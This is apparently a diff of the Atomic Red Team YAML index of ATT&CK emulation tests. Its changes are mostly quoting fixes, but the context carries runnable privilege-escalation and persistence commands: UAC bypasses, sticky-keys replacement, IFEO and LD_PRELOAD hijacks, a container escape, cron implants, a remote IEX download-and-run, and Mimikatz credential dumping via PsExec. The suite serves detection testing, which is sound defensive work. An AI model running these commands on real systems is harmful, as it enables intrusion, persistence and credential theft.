created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 id: attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688 @@ -9955,7 +9955,7 @@ collection: auto_generated_guid: 0f47ceb1-720f-4275-96b8-21f0562217ac description: 'Use screencapture command to collect a full desktop screenshot - ' +' supported_platforms: - macos input_arguments: @@ -9966,16 +9966,16 @@ collection: executor: command: 'screencapture #{output_file} - ' +' cleanup_command: 'rm #{output_file} - ' +' name: bash - name: Screencapture (silent) auto_generated_guid: deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4 description: 'Use screencapture command to collect a full desktop screenshot - ' +' supported_platforms: - macos input_arguments: @@ -9986,17 +9986,17 @@ collection: executor: command: 'screencapture -x #{output_file} - ' +' cleanup_command: 'rm #{output_file} - ' +' name: bash - name: X Windows Capture auto_generated_guid: 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac description: 'Use xwd command to collect a full desktop screenshot and review file with xwud - ' +' supported_platforms: - linux input_arguments: @@ -10018,11 +10018,11 @@ collection: dependencies: - description: 'Package with XWD and XWUD must exist on device - ' +' prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit 1; fi - ' +' get_prereq_command: "sudo #{package_installer} \n" executor: command: | @@ -10030,14 +10030,14 @@ collection: xwud -in #{output_file} cleanup_command: 'rm #{output_file} - ' +' name: bash - name: Capture Linux Desktop using Import Tool auto_generated_guid: 9cd1cccb-91e4-4550-9139-e20a586fcea1 description: 'Use import command from ImageMagick to collect a full desktop screenshot - ' +' supported_platforms: - linux input_arguments: @@ -10048,28 +10048,28 @@ collection: dependencies: - description: 'ImageMagick must be installed - ' +' prereq_command: 'if import -help > /dev/null 2>&1; then exit 0; else exit 1; fi - ' +' get_prereq_command: 'sudo apt-get -y install graphicsmagick-imagemagick-compat - ' +' executor: command: 'import -window root #{output_file} - ' +' cleanup_command: 'rm #{output_file} - ' +' name: bash - name: Windows Screencapture auto_generated_guid: 3c898f62-626c-47d5-aad2-6de873d69153 description: 'Use Psr.exe binary to collect screenshots of user display. Test will do left mouse click to simulate user behaviour - ' +' supported_platforms: - windows input_arguments: @@ -10091,7 +10091,7 @@ collection: cmd /c "timeout #{recording_time} > NULL && psr.exe /stop" cleanup_command: 'rm #{output_file} -ErrorAction Ignore - ' +' - name: Windows Screen Capture (CopyFromScreen) auto_generated_guid: e9313014-985a-48ef-80d9-cde604ffc187 description: | @@ -10115,7 +10115,7 @@ collection: $bitmap.Save("#{output_file}") cleanup_command: 'Remove-Item #{output_file} -ErrorAction Ignore - ' +' name: powershell T1213.002: technique: @@ -10505,7 +10505,7 @@ privilege-escalation: description: 'Comma separated list of system binaries to which you want to attach each #{attached_process}. Default: "osk.exe" - ' +' type: String default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe @@ -10513,7 +10513,7 @@ privilege-escalation: description: 'Full path to process to attach to target in #{parent_list}. Default: cmd.exe - ' +' type: Path default: C:\windows\system32\cmd.exe executor: @@ -10547,7 +10547,7 @@ privilege-escalation: auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3 description: 'Replace sticky keys binary (sethc.exe) with cmd.exe - ' +' supported_platforms: - windows executor: @@ -10558,7 +10558,7 @@ privilege-escalation: copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe - ' +' name: command_prompt elevation_required: true T1547.014: @@ -10817,11 +10817,11 @@ privilege-escalation: - description: 'Reg files must exist on disk at specified locations (#{registry_file} and #{registry_cleanup_file}) - ' +' prereq_command: 'if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file})) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path #{registry_file}) -ErrorAction ignore | Out-Null @@ -10830,11 +10830,11 @@ privilege-escalation: - description: 'DLL''s must exist in the C:\Tools directory (T1546.010.dll and T1546.010x86.dll) - ' +' prereq_command: 'if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll)) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory C:\Tools -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll" -OutFile C:\Tools\T1546.010.dll @@ -10842,10 +10842,10 @@ privilege-escalation: executor: command: 'reg.exe import #{registry_file} - ' +' cleanup_command: 'reg.exe import #{registry_cleanup_file} >nul 2>&1 - ' +' name: command_prompt elevation_required: true T1546.011: @@ -10953,31 +10953,31 @@ privilege-escalation: - description: 'Shim database file must exist on disk at specified location (#{file_path}) - ' +' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicShimx86.sdb" -OutFile "#{file_path}" - description: 'AtomicTest.dll must exist at c:\Tools\AtomicTest.dll - ' +' prereq_command: 'if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path c:\Tools\AtomicTest.dll) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicTest.dll" -OutFile c:\Tools\AtomicTest.dll executor: command: 'sdbinst.exe #{file_path} - ' +' cleanup_command: 'sdbinst.exe -u #{file_path} >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: New shim database files created in the default shim database directory @@ -11175,7 +11175,7 @@ privilege-escalation: description: 'This test submits a command to be run in the future by the `at` daemon. - ' +' supported_platforms: - linux input_arguments: @@ -11191,30 +11191,30 @@ privilege-escalation: dependencies: - description: 'The `at` and `atd` executables must exist in the PATH - ' +' prereq_command: 'which at && which atd - ' +' get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found in the PATH (Package name: `at`)'' - ' +' - description: 'The `atd` daemon must be running - ' +' prereq_command: 'systemctl status atd || service atd status - ' +' get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service atd start` ; systemd: `systemctl start atd`)'' - ' +' executor: name: sh elevation_required: false command: 'echo "#{at_command}" | at #{time_spec} - ' +' T1053.002: technique: external_references: @@ -11311,7 +11311,7 @@ privilege-escalation: elevation_required: false command: 'at 13:20 /interactive cmd - ' +' T1547.002: technique: id: attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec @@ -11640,7 +11640,7 @@ privilege-escalation: cmd.exe /c eventvwr.msc cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1 - ' +' name: command_prompt - name: Bypass UAC using Event Viewer (PowerShell) auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b @@ -11662,7 +11662,7 @@ privilege-escalation: cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse -ErrorAction Ignore - ' +' name: powershell - name: Bypass UAC using Fodhelper auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182 @@ -11684,7 +11684,7 @@ privilege-escalation: cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f >nul 2>&1 - ' +' name: command_prompt - name: Bypass UAC using Fodhelper - PowerShell auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa @@ -11707,7 +11707,7 @@ privilege-escalation: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore - ' +' name: powershell - name: Bypass UAC using ComputerDefaults (PowerShell) auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f @@ -11730,7 +11730,7 @@ privilege-escalation: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Bypass UAC by Mocking Trusted Directories @@ -11778,7 +11778,7 @@ privilege-escalation: cleanup_command: 'Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse -Force -ErrorAction Ignore - ' +' name: powershell - name: Disable UAC using reg.exe auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 @@ -11791,11 +11791,11 @@ privilege-escalation: command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f - ' +' cleanup_command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f - ' +' name: command_prompt elevation_required: true - name: Bypass UAC using SilentCleanup task @@ -11842,7 +11842,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -11853,7 +11853,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -11878,7 +11878,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -11889,7 +11889,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -11913,7 +11913,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -11924,7 +11924,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -11949,7 +11949,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -11960,7 +11960,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -11984,7 +11984,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -11995,7 +11995,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -12019,7 +12019,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -12030,7 +12030,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -12055,7 +12055,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -12066,7 +12066,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -12091,7 +12091,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -12102,7 +12102,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -12216,7 +12216,7 @@ privilege-escalation: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -12261,7 +12261,7 @@ privilege-escalation: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -12299,7 +12299,7 @@ privilege-escalation: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -12416,10 +12416,10 @@ privilege-escalation: executor: command: 'assoc #{extension_to_change}=#{target_extension_handler} - ' +' cleanup_command: 'assoc #{extension_to_change}=#{original_extension_handler} - ' +' name: command_prompt elevation_required: true T1078.004: @@ -12485,7 +12485,7 @@ privilege-escalation: description: 'GCP Service Accounts can be used to gain intial access as well as maintain persistence inside Google Cloud. - ' +' supported_platforms: - google-workspace - windows @@ -12520,20 +12520,20 @@ privilege-escalation: cleanup_command: 'gcloud iam service-accounts delete #{service-account-email} --quiet - ' +' dependency_executor_name: gcloud dependencies: - description: 'Requires gcloud - ' +' prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install" - ' +' T1546.015: technique: external_references: @@ -12675,7 +12675,7 @@ privilege-escalation: CronJob for scheduling execution of malicious code that would run as a container in the cluster. - ' +' supported_platforms: - containers input_arguments: @@ -12686,17 +12686,17 @@ privilege-escalation: dependencies: - description: 'kubectl must be installed - ' +' get_prereq_command: 'echo "kubectl must be installed manually" - ' +' prereq_command: 'which kubectl - ' +' executor: command: 'kubectl get cronjobs -n #{namespace} - ' +' name: bash elevation_required: false - name: CreateCronjob @@ -12708,7 +12708,7 @@ privilege-escalation: CronJob for scheduling execution of malicious code that would run as a container in the cluster. - ' +' supported_platforms: - containers input_arguments: @@ -12719,20 +12719,20 @@ privilege-escalation: dependencies: - description: 'kubectl must be installed - ' +' get_prereq_command: 'echo "kubectl must be installed manually" - ' +' prereq_command: 'which kubectl - ' +' executor: command: 'kubectl create -f src/cronjob.yaml -n #{namespace} - ' +' cleanup_command: 'kubectl delete cronjob art -n #{namespace} - ' +' name: bash elevation_required: false T1134.002: @@ -12932,7 +12932,7 @@ privilege-escalation: of the referenced file. This technique was used by numerous IoT automated exploitation attacks. - ' +' supported_platforms: - macos - linux @@ -12952,7 +12952,7 @@ privilege-escalation: echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} cleanup_command: 'crontab /tmp/notevil - ' +' - name: Cron - Add script to all cron subfolders auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily, @@ -12960,7 +12960,7 @@ privilege-escalation: schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - macos - linux @@ -12992,7 +12992,7 @@ privilege-escalation: to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - linux input_arguments: @@ -13009,10 +13009,10 @@ privilege-escalation: name: bash command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} - ' +' cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} - ' +' T1574.001: technique: id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34 @@ -13187,10 +13187,10 @@ privilege-escalation: dependencies: - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable}) - ' +' prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}" @@ -13198,7 +13198,7 @@ privilege-escalation: command: "#{gup_executable}\n" cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 - ' +' name: command_prompt T1078.001: technique: @@ -13318,7 +13318,7 @@ privilege-escalation: description: 'The Adversaries can activate the default Guest user. The guest account is inactivated by default - ' +' supported_platforms: - windows input_arguments: @@ -13329,10 +13329,10 @@ privilege-escalation: executor: command: 'net user #{guest_user} /active:yes - ' +' cleanup_command: 'net user #{guest_user} /active:no - ' +' name: command_prompt elevation_required: true T1078.002: @@ -13588,13 +13588,13 @@ privilege-escalation: Provider to be federated must be configured (outside of the scope of this test). - ' +' prereq_command: 'if (Get-Module AzureADPreview) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Install-Module -Name AzureADPreview -Force - ' +' executor: command: | Import-Module AzureADPreview @@ -13856,21 +13856,21 @@ privilege-escalation: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) - ' +' prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} - ' +' executor: command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload'' - ' +' cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload - ' +' name: bash elevation_required: true - name: Shared Library Injection via LD_PRELOAD @@ -13895,18 +13895,18 @@ privilege-escalation: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) - ' +' prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} - ' +' executor: command: 'LD_PRELOAD=#{path_to_shared_library} ls - ' +' name: bash T1055.001: technique: @@ -14006,10 +14006,10 @@ privilege-escalation: dependencies: - description: 'Utility to inject must exist on disk at specified location (#{dll_payload}) - ' +' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "#{dll_payload}" @@ -14155,7 +14155,7 @@ privilege-escalation: description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor) daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124 - ' +' supported_platforms: - macos input_arguments: @@ -14253,24 +14253,24 @@ privilege-escalation: - description: Verify docker is installed. prereq_command: 'which docker - ' +' get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi - ' +' - description: Verify docker service is running. prereq_command: 'sudo systemctl status docker - ' +' get_prereq_command: 'sudo systemctl start docker - ' +' - description: Verify kind is in the path. prereq_command: 'which kind - ' +' get_prereq_command: | curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64 chmod +x ./kind @@ -14278,14 +14278,14 @@ privilege-escalation: - description: Verify kind-atomic-cluster is created prereq_command: 'sudo kind get clusters - ' +' get_prereq_command: 'sudo kind create cluster --name atomic-cluster - ' +' - description: Verify kubectl is in path prereq_command: 'which kubectl - ' +' get_prereq_command: | curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl" chmod +x ./kubectl @@ -14296,11 +14296,11 @@ privilege-escalation: true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"securityContext":{"privileged":true}}]}}'' - ' +' name: sh cleanup_command: 'kubectl --context kind-atomic-cluster delete pod atomic-escape-pod - ' +' T1546: technique: id: attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db @@ -14844,7 +14844,7 @@ privilege-escalation: auto_generated_guid: fdda2626-5234-4c90-b163-60849a24c0b8 description: 'Leverage Global Flags Settings - ' +' supported_platforms: - windows input_arguments: @@ -14860,19 +14860,19 @@ privilege-escalation: command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}" - ' +' cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /f >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: IFEO Global Flags auto_generated_guid: 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 description: 'Leverage Global Flags Settings - ' +' supported_platforms: - windows input_arguments: @@ -15008,7 +15008,7 @@ privilege-escalation: description: 'This test uses the insmod command to load a kernel module for Linux. - ' +' supported_platforms: - linux input_arguments: @@ -15032,10 +15032,10 @@ privilege-escalation: dependencies: - description: 'The kernel module must exist on disk at specified location - ' +' prereq_command: 'if [ -f #{module_path} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: | if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi; cp #{module_source_path}/* #{temp_folder}/ @@ -15044,7 +15044,7 @@ privilege-escalation: executor: command: 'sudo insmod #{module_path} - ' +' cleanup_command: | sudo rmmod #{module_name} [ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder} @@ -15250,7 +15250,7 @@ privilege-escalation: auto_generated_guid: a5983dee-bf6c-4eaf-951c-dbc1a7b90900 description: 'Create a plist and execute it - ' +' supported_platforms: - macos input_arguments: @@ -15267,15 +15267,15 @@ privilege-escalation: - description: 'The shared library must exist on disk at specified location (#{path_malicious_plist}) - ' +' prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "The shared library doesn''t exist. Check the path"; exit 1; - ' +' executor: name: bash elevation_required: true @@ -15369,7 +15369,7 @@ privilege-escalation: auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf description: 'Utilize LaunchDaemon to launch `Hello World` - ' +' supported_platforms: - macos input_arguments: @@ -15386,15 +15386,15 @@ privilege-escalation: - description: 'The shared library must exist on disk at specified location (#{path_malicious_plist}) - ' +' prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and try again."; exit 1; - ' +' executor: name: bash elevation_required: true @@ -15614,7 +15614,7 @@ privilege-escalation: auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4 description: 'Mac logon script - ' +' supported_platforms: - macos executor: @@ -15812,7 +15812,7 @@ privilege-escalation: description: 'Netsh interacts with other operating system components using dynamic-link library (DLL) files - ' +' supported_platforms: - windows input_arguments: @@ -15823,7 +15823,7 @@ privilege-escalation: executor: command: 'netsh.exe add helper #{helper_file} - ' +' name: command_prompt T1037.003: technique: @@ -15985,10 +15985,10 @@ privilege-escalation: dependencies: - description: 'DLL to inject must exist on disk at specified location (#{dll_path}) - ' +' prereq_command: 'if (Test-Path #{dll_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}" @@ -16029,7 +16029,7 @@ privilege-escalation: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine ''#{command_line}'' -ParentId #{parent_pid}' @@ -16058,7 +16058,7 @@ privilege-escalation: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid #{test_guid}' @@ -16088,7 +16088,7 @@ privilege-escalation: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, ProcessId -Filter "Name = ''svchost.exe'' AND CommandLine LIKE ''%''" | @@ -16124,7 +16124,7 @@ privilege-escalation: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine ''#{command_line}''' @@ -16534,7 +16534,7 @@ privilege-escalation: auto_generated_guid: 394a538e-09bb-4a4a-95d1-b93cf12682a8 description: 'Modify MacOS plist file in one of two directories - ' +' supported_platforms: - macos executor: @@ -16635,11 +16635,11 @@ privilege-escalation: command: 'reg add "hklm\system\currentcontrolset\control\print\monitors\ART" /v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ - ' +' cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\print\monitors\ART" /f >nul 2>&1 - ' +' name: command_prompt elevation_required: true T1055.002: @@ -16787,7 +16787,7 @@ privilege-escalation: profile pofile that points to a malicious executable. Upon execution, calc.exe will be launched. - ' +' supported_platforms: - windows input_arguments: @@ -16803,13 +16803,13 @@ privilege-escalation: dependencies: - description: 'Ensure a powershell profile exists for the current user - ' +' prereq_command: 'if (Test-Path #{ps_profile}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'New-Item -Path #{ps_profile} -Type File -Force - ' +' executor: command: | Add-Content #{ps_profile} -Value "" @@ -17156,13 +17156,13 @@ privilege-escalation: cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore - ' +' name: powershell - name: RunPE via VBA auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b description: 'This module executes notepad.exe from within the WINWORD.EXE process - ' +' supported_platforms: - windows input_arguments: @@ -17174,7 +17174,7 @@ privilege-escalation: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -17185,7 +17185,7 @@ privilege-escalation: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -17308,7 +17308,7 @@ privilege-escalation: dependencies: - description: 'The 64-bit version of Microsoft Office must be installed - ' +' prereq_command: | try { $wdApp = New-Object -COMObject "Word.Application" @@ -17319,7 +17319,7 @@ privilege-escalation: get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -17354,7 +17354,7 @@ privilege-escalation: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) - ' +' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -17369,10 +17369,10 @@ privilege-escalation: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path}) - ' +' prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" @@ -17383,7 +17383,7 @@ privilege-escalation: command: '#{psexec_path} /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa /inject /id:500" "exit" - ' +' name: command_prompt elevation_required: false T1055.008: @@ -17560,14 +17560,14 @@ privilege-escalation: command: 'sudo echo osascript -e ''tell app "Finder" to display dialog "Hello World"'' >> /etc/rc.common - ' +' elevation_required: true name: bash - name: rc.common auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a description: 'Modify rc.common - ' +' supported_platforms: - linux executor: @@ -17583,12 +17583,12 @@ privilege-escalation: ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi - ' +' - name: rc.local auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102 description: 'Modify rc.local - ' +' supported_platforms: 